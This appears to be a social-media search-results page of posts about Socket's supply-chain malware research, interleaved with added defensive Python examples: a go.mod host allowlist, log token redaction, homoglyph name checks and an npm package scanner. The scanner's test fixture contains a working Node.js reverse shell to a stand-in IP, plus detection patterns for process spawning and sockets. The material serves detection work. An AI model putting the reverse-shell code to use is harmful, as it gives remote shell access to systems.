home.social


51 results for “SocketSecurity”

  1. RE: fosstodon.org/@SocketSecurity/

    This might also be a reason why, especially since Go benefits from a package system that can pull from any URL, people might want to move off of Github. Name-spoofing becomes a little more difficult when you have your own domain.

    #golang
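The post above relies on the fact that a Go module path begins with the host it is fetched from, so the host is part of the dependency's identity. The following is an added example (not the poster's code and not part of any Go tooling) of turning that into a check: parse a go.mod, take the host of each required module, and flag anything that is not on an organisation's allowlist or that merely looks like an allowlisted host. The go.mod text, the allowlist and the similarity threshold are all constructed for the demo.

```python
"""Added example: a go.mod host allowlist check. Illustrative code, not from
the post above or from any Go tooling; the go.mod text, the allowlist and the
lookalike threshold are all constructed for the demo."""
from difflib import SequenceMatcher

# Constructed go.mod; the 'githud.com' require is a lookalike of github.com.
SAMPLE_GO_MOD = """\
module example.com/internal/tool

go 1.22

require golang.org/x/crypto v0.21.0

require (
    github.com/spf13/cobra v1.8.0
    example.com/libs/auth v1.2.3
    githud.com/spf13/cobra v1.8.0 // indirect
    gitlab.example.net/team/metrics v0.3.0
)
"""

# Hypothetical allowlist: hosts this organisation is willing to pull from.
ALLOWED_HOSTS = {"github.com", "golang.org", "example.com"}


def module_paths(go_mod: str) -> list[str]:
    """Return the module path of every require directive in a go.mod."""
    paths: list[str] = []
    in_block = False
    for raw in go_mod.splitlines():
        line = raw.split("//", 1)[0].strip()  # drop trailing comments
        if not line:
            continue
        if line.startswith("require ("):
            in_block = True
        elif in_block and line == ")":
            in_block = False
        elif in_block:
            paths.append(line.split()[0])
        elif line.startswith("require "):
            paths.append(line.split()[1])
    return paths


def host_of(module_path: str) -> str:
    """The first element of a Go module path is the host it is fetched from."""
    return module_path.split("/", 1)[0].lower()


def classify_host(host: str, allowed=ALLOWED_HOSTS, threshold: float = 0.85) -> str:
    """'allowed', 'lookalike of <host>' (close to but not equal to an allowed
    host), or 'unlisted' for anything else."""
    if host in allowed:
        return "allowed"
    closest = max(allowed, key=lambda a: SequenceMatcher(None, host, a).ratio())
    if SequenceMatcher(None, host, closest).ratio() >= threshold:
        return f"lookalike of {closest}"
    return "unlisted"


def audit_go_mod(go_mod: str) -> dict[str, str]:
    """Map each required module path to a verdict on its host."""
    return {p: classify_host(host_of(p)) for p in module_paths(go_mod)}


if __name__ == "__main__":
    for path, verdict in audit_go_mod(SAMPLE_GO_MOD).items():
        print(f"{verdict:26} {path}")
```

The lookalike test is deliberately crude (a sequence-similarity ratio); in practice you would also check the host's TLS certificate and ownership, but the point is that the host is visible in the dependency list and can be policed, which is what makes spoofing harder once you publish under your own domain.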

  2. New.

    Socket: TeamPCP and BreachForums Launch $1,000 Contest for Supply Chain Attacks socket.dev/blog/teampcp-supply @SocketSecurity #infosec

  3. Posted yesterday, if you missed this:

    Socket: 5 Malicious NuGet Packages Impersonate Chinese UI Libraries to Distribute Crypto Wallet and Credential Stealer socket.dev/blog/5-malicious-nu @SocketSecurity #infosec #threatresearch #Windows

  4. TC39 Advances “Array.fromAsync”, “Error.isError”, and Explicit Resource Management to Stage 4, by @sarahgooding (@SocketSecurity):

    socket.dev/blog/tc39-advances-

    #ecmascript #arrays #errors

  5. New on the BoxyHQ blog - Progress and Challenges In Securing The Web Ecosystem in 2023 - A Year in Review by BoxyHQ 📦 boxyhq.com/blog/boxyhq-2023-ye #opensource #saml #sso #news #securingtheweb #mvsp - Notable mentions: @osi @SocketSecurity @fidoalliance

  6. New on the BoxyHQ blog - Progress and Challenges In Securing The Web Ecosystem in 2023 - A Year in Review by BoxyHQ 📦 boxyhq.com/blog/boxyhq-2023-ye - Notable mentions: @osi @SocketSecurity @fidoalliance

  7. 🚨 Socket detected malicious activity in newly published versions of node-ipc, an npm package with 822K weekly downloads.

    Affected versions:
    [email protected]
    [email protected]
    [email protected]

    Socket’s AI scanner flagged the malware within ~3 minutes of publication.

    Early analysis shows obfuscated stealer/backdoor behavior, including host fingerprinting, local file enumeration, payload wrapping, and attempted exfiltration.

    socket.dev/blog/node-ipc-packa

  8. 🐘 @packagist is urging projects to update Composer after a GitHub token format change caused some GitHub Actions tokens to be exposed in CI logs.

    GitHub has rolled back the token change for now, but affected projects still need to update Composer.

    socket.dev/blog/packagist-urge
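The failure mode in the post above, a credential showing up in CI logs after its format changed, is what happens when log redaction is keyed on the shape of the secret rather than on its value. The following is an added example (not the poster's code, not Composer's, and not a description of the actual Composer bug, whose details the post does not give): a redactor that only knows one historical prefix silently stops working on a new token shape, next to a redactor that replaces the literal secret values the job was given, plus a check that can gate a CI run. The log lines, token values and prefixes are constructed; the real prefixes and lengths are an assumption made only for illustration.

```python
"""Added example, not from the post or from Composer: prefix-keyed log
redaction versus value-keyed redaction. Token values, their shapes and the
log excerpt are constructed for the demo."""
import re

# Fake tokens; only their shapes differ. Lengths and prefixes are assumptions.
OLD_STYLE_TOKEN = "ghp_" + "A" * 36
NEW_STYLE_TOKEN = "github_pat_" + "B" * 22 + "_" + "C" * 59

SAMPLE_LOG = f"""\
Installing dependencies from lock file
Downloading https://api.github.com/repos/acme/lib/zipball/abc123 with token {OLD_STYLE_TOKEN}
Downloading https://api.github.com/repos/acme/lib2/zipball/def456 with token {NEW_STYLE_TOKEN}
Authorization: Bearer {NEW_STYLE_TOKEN}
"""

# Weak redactor: it encodes one historical token shape and nothing else.
PREFIX_PATTERN = re.compile(r"\bghp_[A-Za-z0-9]{36}\b")


def redact_by_prefix(text: str) -> str:
    """Redact only values matching the one shape the pattern knows about."""
    return PREFIX_PATTERN.sub("[REDACTED]", text)


def redact_known_secrets(text: str, secrets) -> str:
    """Replace every literal secret value the job was given, longest first so
    that a secret containing another secret is never partially revealed.
    Format-agnostic: a new token shape changes nothing here."""
    for secret in sorted((s for s in secrets if s), key=len, reverse=True):
        text = text.replace(secret, "[REDACTED]")
    return text


def leaked_secrets(text: str, secrets) -> list[str]:
    """Secrets that still appear verbatim in the output; non-empty means the
    run should fail before the log is uploaded anywhere."""
    return [s for s in secrets if s and s in text]


if __name__ == "__main__":
    secrets = [OLD_STYLE_TOKEN, NEW_STYLE_TOKEN]
    by_prefix = redact_by_prefix(SAMPLE_LOG)
    print("prefix redactor leaked:", len(leaked_secrets(by_prefix, secrets)))
    by_value = redact_known_secrets(SAMPLE_LOG, secrets)
    print("value redactor leaked:", len(leaked_secrets(by_value, secrets)))
    print(by_value)
```

The value-keyed redactor is only as good as the list of secrets you hand it, so it belongs alongside, not instead of, a pattern scan: the pattern scan catches secrets you did not know were in play, the value scan catches the ones you did regardless of how their format evolves.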

  9. 🚨 Socket’s Threat Research Team uncovered a malicious Chrome extension posing as an wallet. It steals seed phrases by encoding them into transactions and leaks them on-chain - no C2 needed.

    socket.dev/blog/malicious-chro

  10. 🚨 New Research: Threat actors compromised four extensions, pushed malicious updates that load encrypted malware, evade Russian locales, and fetch C2 instructions via memos, leading to macOS credential and wallet theft.

    Full analysis: socket.dev/blog/glassworm-load

  11. 🚨 New research: A malicious Chrome Web Store extension is stealing newly created API keys and exfiltrating them to a Telegram bot, enabling full account takeover with trading and withdrawal rights.

    Details → socket.dev/blog/malicious-chro

  12. 🚨 We detected malicious client packages published to npm and PyPI after a maintainer account compromise, enabling wallet theft and remote code execution.

    Full investigation → socket.dev/blog/malicious-dydx

  13. 🚨 New threat research: An impostor package typosquatted a popular .NET tracing library and its author, using homoglyph tricks to blend in, then exfiltrated wallet JSON and passwords to a Russian IP address.

    Full report →
    socket.dev/blog/malicious-nuge
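Homoglyph impersonation of the kind described in the post above (a package ID or author name that renders identically to a trusted one) is cheap to detect once names are reduced to a canonical "skeleton" before comparison. The following is an added example (not the poster's code and not NuGet's) that normalises names, maps a small set of confusable characters to their Latin lookalikes, and reports candidates whose skeleton collides with a known name while the raw string differs. The confusable table is a hand-picked subset (a full deployment would load the Unicode confusables data), and the package and author names are constructed.

```python
"""Added example, not from the post or from NuGet: homoglyph-aware comparison
of package and author names. The confusables table is a small hand-picked
subset (an assumption, not the full Unicode list); all names are constructed."""
import unicodedata

# Cyrillic, Greek and other letters that render like Latin ones.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0458": "j", "\u0455": "s",
    "\u0501": "d", "\u04bb": "h", "\u04cf": "l", "\u0261": "g",
    "\u03bf": "o", "\u03b1": "a", "\u03bd": "v", "\u0131": "i", "\u217c": "l",
}
DIGIT_LOOKALIKES = {"0": "o", "1": "l"}


def skeleton(name: str) -> str:
    """Canonical comparison form: compatibility-normalise, casefold, map
    confusables and digit lookalikes to Latin letters, drop separators."""
    out = []
    for ch in unicodedata.normalize("NFKC", name).casefold():
        ch = CONFUSABLES.get(ch, ch)
        ch = DIGIT_LOOKALIKES.get(ch, ch)
        if ch in "-_.":
            continue
        out.append(ch)
    return "".join(out)


def impersonations(candidates, known):
    """(candidate, known_name) pairs whose skeletons collide but whose raw
    strings differ, i.e. lookalikes rather than the genuine name."""
    by_skeleton = {skeleton(k): k for k in known}
    hits = []
    for c in candidates:
        k = by_skeleton.get(skeleton(c))
        if k is not None and c != k:
            hits.append((c, k))
    return hits


# Constructed data. The impostors use Cyrillic letters: U+0410 for 'A',
# U+0456 for 'i', U+043E for 'o'.
KNOWN_PACKAGES = ["Acme.Tracing", "Acme.Tracing.Abstractions"]
KNOWN_AUTHORS = ["acme-tools"]
NEW_PACKAGES = ["\u0410cme.Tracing", "Acme.Tracing", "Acme.Trac\u0456ng", "Acme.Logging"]
NEW_AUTHORS = ["acme-tools", "acme-to\u043els"]

if __name__ == "__main__":
    for cand, real in impersonations(NEW_PACKAGES, KNOWN_PACKAGES):
        print(f"package {cand!r} looks like {real!r}")
    for cand, real in impersonations(NEW_AUTHORS, KNOWN_AUTHORS):
        print(f"author {cand!r} looks like {real!r}")
```

Run the same function over the author field as over the package ID; as the post notes, the impersonation in that case targeted both, and a check that only looks at one of them leaves the other as a trust signal the attacker controls.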

  14. 🚨 New from the Socket Threat Research Team: 5 coordinated Chrome extensions hijack sessions and block security controls in enterprise HR and ERP platforms like Workday and NetSuite.

    Full report → socket.dev/blog/5-malicious-ch

  15. 🚨 The Socket Research team has uncovered a malicious npm package targeting developers using tools in their development environments: socket.dev/blog/malicious-npm-

  16. 📦 Our latest investigation of Black Basta's leaked chats shows how they were plotting to exploit open source package registries to deploy ransomware, plus our analysis of & wiperware packages already in the wild.

    socket.dev/blog/black-basta-de

  17. At , NIST revealed that the NVD is scrapping its consortium plan, walking back last year’s promise of reform, while pitching new tools that critics say won't meaningfully address the backlog or transparency problem.

    socket.dev/blog/vulncon-2025-n

  18. 🚨 Socket researchers discovered an npm package targeting traders. It hunts for wallet keys & credentials, then exfiltrates them via Telegram. A second package serves as a minimal wrapper to execute the payload.

    Full report → socket.dev/blog/malicious-npm-

  19. 🚨 The Socket Research team has uncovered a malicious npm package targeting #Ethereum developers using #Hardhat tools in their development environments: socket.dev/blog/malicious-npm-

  20. 🚨 The Socket Research team has uncovered a malicious npm package targeting #Ethereum developers using #Hardhat tools in their development environments: socket.dev/blog/malicious-npm-

  21. 🚨 The Socket Research team has uncovered a malicious npm package targeting #Ethereum developers using #Hardhat tools in their development environments: socket.dev/blog/malicious-npm-

  22. 🚀 Exciting news: Socket is now part of TC54! We're joining forces to help shape the future of SBOMs, CycloneDX, and PURL, making software supply chains more secure & transparent.

    socket.dev/blog/socket-joins-t

  23. 📌 New from the Socket Research Team: A malicious npm package disguised as an integration triggers a reverse shell during payment success. Unlike many malicious packages that execute code during installation, this payload is delayed until runtime.

    socket.dev/blog/npm-package-ad
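The distinction the post above draws, install-time execution versus a payload that waits for a runtime event, matters for reviewers because a check that only inspects lifecycle scripts in package.json finds nothing in the second case. The following is an added example (not the poster's code and not any Socket tooling) of a scanner that looks at both: it lists install-time hooks and, separately, searches the package source for the combination of process spawning and raw sockets that a reverse shell needs. The package.json, the index.js, the indicator patterns and the verdict labels are all constructed for the demo; the patterns are heuristics and each is a weak signal on its own.

```python
"""Added example, not from the post or from any Socket tooling: check both
install-time hooks and runtime indicators in an npm package. The package
contents, patterns and verdict labels are constructed for the demo."""
import json
import re

# Constructed package: no lifecycle hooks, but the exported handler opens a
# reverse shell when it is called (stand-in for a payload that fires at runtime).
PACKAGE_JSON = json.dumps({
    "name": "acme-checkout-hook", "version": "1.0.0", "main": "index.js",
    "scripts": {"test": "node test.js"},
})
INDEX_JS = r"""
const { spawn } = require('child_process');
const net = require('net');
exports.onPaymentSuccess = function (order) {
  const sock = net.connect(4444, '203.0.113.5', () => {
    const sh = spawn('/bin/sh', []);
    sh.stdout.pipe(sock);
    sock.pipe(sh.stdin);
  });
};
"""
# Constructed counter-example with a classic install-time hook.
HOOKED_PACKAGE_JSON = json.dumps({"name": "x", "scripts": {"postinstall": "node x.js"}})

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic runtime indicators; the verdict below combines them.
RUNTIME_INDICATORS = {
    "spawns a process": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "opens a raw socket": re.compile(r"require\(\s*['\"]net['\"]\s*\)"),
    "pipes process stdio": re.compile(r"\.stdout\.pipe\(|\.pipe\(\s*\w+\.stdin\s*\)"),
    "decodes embedded payload": re.compile(r"Buffer\.from\([^)]*,\s*['\"]base64['\"]\s*\)"),
    "evaluates dynamic code": re.compile(r"\beval\(|new Function\("),
}


def install_hooks(package_json: str) -> list[str]:
    """Lifecycle scripts that run at install time, in declaration order."""
    scripts = json.loads(package_json).get("scripts", {})
    return [h for h in LIFECYCLE_HOOKS if h in scripts]


def runtime_indicators(source: str) -> list[str]:
    """Labels of every indicator pattern present in the source."""
    return [label for label, rx in RUNTIME_INDICATORS.items() if rx.search(source)]


def assess(package_json: str, source: str) -> dict:
    """Combine both views. A package with no hooks is not clean by itself."""
    hooks = install_hooks(package_json)
    indicators = runtime_indicators(source)
    if hooks:
        verdict = "install-time hook present"
    elif {"spawns a process", "opens a raw socket"} <= set(indicators):
        verdict = "runtime-only: process plus socket, review before use"
    elif indicators:
        verdict = "runtime indicators present, review"
    else:
        verdict = "nothing flagged"
    return {"hooks": hooks, "indicators": indicators, "verdict": verdict}


if __name__ == "__main__":
    print(assess(PACKAGE_JSON, INDEX_JS))
    print(assess(HOOKED_PACKAGE_JSON, ""))
```

The sample package would pass an install-script review and only be caught by the source scan, which is the point of the post: the absence of lifecycle hooks says nothing about what the package does once your application calls into it.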